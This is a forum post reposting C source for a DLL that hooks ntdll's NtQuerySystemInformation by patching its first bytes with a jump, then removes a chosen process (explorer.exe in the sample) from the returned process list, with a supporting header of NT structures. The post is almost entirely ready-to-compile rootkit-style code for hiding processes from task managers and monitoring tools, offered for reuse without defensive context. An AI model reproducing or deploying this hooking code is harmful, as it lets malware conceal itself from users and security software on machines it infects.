Jump to content
Nytro

[c] Process Hiding

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[c] Process Hiding

Author: stdio

I didnt really see a good c example so I decided to share my dll that hooks NtQuerySystemInformation and hides explorer.exe

#include <Windows.h>
#include "sysinfo.h"

BYTE OrigBytes[5];
WCHAR g_TargetProc[] = L"explorer.exe";

__declspec(naked) NTSTATUS NTAPI  OriginalNtQuerySystemInformation(
		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
		IN OUT PVOID SystemInformation,
		IN ULONG SystemInformationLength,
		OUT PULONG ReturnLength OPTIONAL
	)
{
    __asm
    {
		mov eax, 0dfh //5 Bytes overwritten	with original read 5
        mov ecx, 0xcafebabe 
        jmp ecx             
    }
}

NTSTATUS NTAPI HookedNtQuerySystemInformation(
		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
		IN OUT PVOID SystemInformation,
		IN ULONG SystemInformationLength,
		OUT PULONG ReturnLength OPTIONAL
	)
{
	NTSTATUS Result;
	PSYSTEM_PROCESSES pSystemProcess;
	PSYSTEM_PROCESSES pNextSystemProcess;

	Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

	switch(SystemInformationClass)
	{

		case SystemProcessInformation:

			pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
			pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);

			while(pNextSystemProcess->NextEntryDelta != 0)
			{
				if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
					pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
				}
				pSystemProcess = pNextSystemProcess;
				pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
			}
			break;

	}

	return Result;

}


DWORD PlaceHook()
{
	DWORD oldProtect;
	LPVOID sourceFunction;
	LPVOID destFunction;
	LPVOID stubFunction;

	destFunction = HookedNtQuerySystemInformation;
	stubFunction = OriginalNtQuerySystemInformation;

	sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
  	CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);

    if(sourceFunction == NULL){
        return 1;
    }

	// PatchStub
    VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
	CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
    *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
    VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);

    //PatchSource
	VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    *(LPBYTE)sourceFunction = 0xE9;
    *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
    VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);

	return 0;
}

void UnHook()
{
	DWORD	oldProtect;

	LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
	VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
	CopyMemory(addr,OrigBytes,sizeof(BYTE)*5);
	VirtualProtect(addr, 5, oldProtect, &oldProtect);
}



BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){

	switch (dwReason){

		case DLL_PROCESS_ATTACH:
			PlaceHook();
			break;
		case DLL_PROCESS_DETACH:
			UnHook();
			break;
	}

	return TRUE;
}

and the header:

#ifndef __SYSINFO_H__
#define __SYSINFO_H__

#ifndef NTSTATUS
#define NTSTATUS LONG
#endif

#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_SUCCESS	0x00000000

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation, 
SystemProcessorInformation, 
SystemPerformanceInformation, 
SystemTimeOfDayInformation, 
SystemPathInformation, 
SystemProcessInformation, 
SystemCallCountInformation, 
SystemDeviceInformation, 
SystemProcessorPerformanceInformation, 
SystemFlagsInformation, 
SystemCallTimeInformation, 
SystemModuleInformation, 
SystemLocksInformation, 
SystemStackTraceInformation, 
SystemPagedPoolInformation, 
SystemNonPagedPoolInformation, 
SystemHandleInformation, 
SystemObjectInformation, 
SystemPageFileInformation, 
SystemVdmInstemulInformation, 
SystemVdmBopInformation, 
SystemFileCacheInformation, 
SystemPoolTagInformation, 
SystemInterruptInformation, 
SystemDpcBehaviorInformation, 
SystemFullMemoryInformation, 
SystemLoadGdiDriverInformation, 
SystemUnloadGdiDriverInformation, 
SystemTimeAdjustmentInformation, 
SystemSummaryMemoryInformation, 
SystemNextEventIdInformation, 
SystemEventIdsInformation, 
SystemCrashDumpInformation, 
SystemExceptionInformation, 
SystemCrashDumpStateInformation, 
SystemKernelDebuggerInformation, 
SystemContextSwitchInformation, 
SystemRegistryQuotaInformation, 
SystemExtendServiceTableInformation, 
SystemPrioritySeperation, 
SystemPlugPlayBusInformation, 
SystemDockInformation, 
SystemPowerInformation1, 
SystemProcessorSpeedInformation, 
SystemCurrentTimeZoneInformation, 
SystemLookasideInformation

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

typedef struct _LSA_UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

typedef CONST PUNICODE_STRING PCUNICODE_STRING;

typedef LONG KPRIORITY;

typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;

typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;

typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;

typedef struct _SYSTEM_PROCESSES { 
		ULONG NextEntryDelta;
		ULONG ThreadCount;
		ULONG Reserved1[6];
		LARGE_INTEGER CreateTime;
		LARGE_INTEGER UserTime;
		LARGE_INTEGER KernelTime;
		UNICODE_STRING ProcessName; 
		KPRIORITY BasePriority;
		ULONG ProcessId;
		ULONG InheritedFromProcessId;
		ULONG HandleCount;
		ULONG Reserved2[2];
		VM_COUNTERS VmCounters;
		IO_COUNTERS IoCounters;  
		SYSTEM_THREADS Threads[1];
	} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;



typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
		IN OUT PVOID SystemInformation,
		IN ULONG SystemInformationLength,
		OUT PULONG ReturnLength OPTIONAL
	);

#endif

Sursa: [c] Process Hiding

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...